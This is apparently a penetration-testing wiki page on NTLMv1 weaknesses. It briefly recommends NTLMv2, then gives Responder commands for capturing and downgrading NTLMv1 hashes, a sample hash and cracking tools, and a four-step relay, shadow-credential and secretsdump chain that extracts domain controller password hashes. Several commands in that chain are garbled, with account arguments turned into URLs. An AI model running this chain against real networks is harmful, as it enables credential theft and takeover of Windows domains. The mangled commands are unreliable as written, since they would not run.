NTLMv1

NT LAN Manager version 1 (NTLMv1) is vulnerable to several attacks and should be disabled in environments whenever possible. All Microsoft operating systems support its successor NT Lan Manager version 2 (NTLMv2) which should be used instead.

A NTLMv1 hash is formatted like the following:

username::hostname:response:response:challenge -> NTHASH:response

Downgrading

It is possible in environments where NT LAN Manager version 1 is utilized to obtain an NTLMv1 hash from a target computer.

While this was partially described in the Coercion section, prior to receiving a callback we need to run Responder, after modifying the 'Challenge' variable to 1122334455667788. We can then run Responder with the following options:

# Receive and attempt to crack the hash with crack.sh's rainbow tables
Responder.py -I $interface --lm 

# Attempt to remove ESS/SSP and crack locally or for a fee
Responder.py -I $interface --lm --disable-ess

Cracking NTLMv1

Referencing crack.sh, a NTLMv1 hash with ESS/SSP looks like the following:

hashcat::DUSTIN-5AA37877:85D5BC2CE95161CD00000000000000000000000000000000:892F905962F76D323837F613F88DE27C2BBD6C9ABCD021D0:1122334455667788

After obtaining a hash with ESS/SSP, we first need to reformat the obtained hash using EvilMog's NTLMv1-multi tool or assless-chaps and cracked with a database of NT hashes.

Attacking a Domain Controller

If NTLMv1 is enabled, you can leverage the ability where DC's have the ability to modify their own msDS-KeyCredentialLink attribute. It should be noted this requires two domain controllers to exploit.

1. ntlmrelayx.py -t ldap://$dc1 -of hashes --shadow-credentials --shadow-target '$dc2' --cert-outfile-path crt --no-validate-privs --remove-mic
2. gettgtpkinit.py -cert-pfx crt.pfx -pfx-pass PFX_PASSWORD http://contoso.com/DC2$ crt.ccache
3. KRB5CCNAME=crt.ccache http://getnthash.py http://contoso.com/DC2\$ -key KEY_FROM_PKINIT
4. secretsdump.py 'http://contoso.com/DC2$'@DC2 -hashes :LMHASH_FROM_GETNTHASH -history

References